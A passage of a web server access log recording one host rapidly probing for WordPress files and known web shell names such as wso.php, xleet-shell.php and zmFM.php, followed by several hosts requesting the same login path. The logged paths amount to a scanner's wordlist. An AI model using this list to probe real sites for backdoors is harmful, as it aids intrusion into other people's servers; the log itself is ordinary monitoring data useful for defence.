Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/flame.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/admin.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/about.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/function.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/fw.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/install.php HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/inputs.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/index.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/IXR/index.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/languages/about.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/plugins/inputs.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/radio.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:15 -0400] "GET /wp-content/themes/about.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/themes/inputs.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/themes/index.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/themes/alera/alpha.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/uploads/about.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/uploads/index.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/wso.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/uploads/inputs.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-content/xleet.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:16 -0400] "GET /wp-defaul.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-cron.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/assets/index.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-files.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/autoload_classmap.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/assets/wp-login.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/content.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/certificates/zmFM.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/certificates/index.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/cron.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/css/gelay.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/css/wp-login.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/css/themes.php HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/css/index.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/customize/index.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:17 -0400] "GET /wp-includes/customize/zmFM.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/fonts/dev.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/fonts/about.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/default.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/fonts/iq.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/fonts/iqb.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/images/include.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/fw.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/images/wp-login.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:18 -0400] "GET /wp-includes/index.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/IXR/index HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/install.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/inputs.php HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/js/crop/index.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/js/index.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/library.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/l10n.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/PHPMailer/zmFM.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/plugins.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/radio.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/pomo/zmFM.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/pomo/index.php HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:19 -0400] "GET /wp-includes/Requests/Auth/index.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:20 -0400] "GET /wp-includes/Requests/about.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:20 -0400] "GET /wp-includes/sitemaps/providers/zmFM.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:20 -0400] "GET /wp-includes/rest-api/index.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:20 -0400] "GET /wp-includes/rest-api/about.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:20 -0400] "GET /wp-includes/Text/index.php HTTP/1.1" 301 257 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:20 -0400] "GET /wp-includes/Text/Diff/index.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/up.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/themes.php HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/theme-compat/zmFM.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/upload.php HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/widgets/about.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/wp-login.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/widgets/index.php HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/x.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-includes/xmlrpc.php HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-mail.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-load.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-mails.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:21 -0400] "GET /wp-trackback.php HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wp.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wp1.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wp-wso.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wp/wp-includes/fonts/dev.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wp/wp-includes/fonts/iqb.php HTTP/1.1" 301 259 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wso.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wsanon.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wpindex.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /x.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:22 -0400] "GET /wso403.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /xmlrpc.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /xleet.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /xleet-shell.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /xmrlpc.php?p= HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /xmrlpc.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /y.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /xxx.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /xx.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /z.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:23 -0400] "GET /zero.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:24 -0400] "GET /zone.php?phpshell HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 209.38.125.40 - - [12/Aug/2025:20:57:59 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:20:57:59 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:20:57:59 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:20:57:59 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 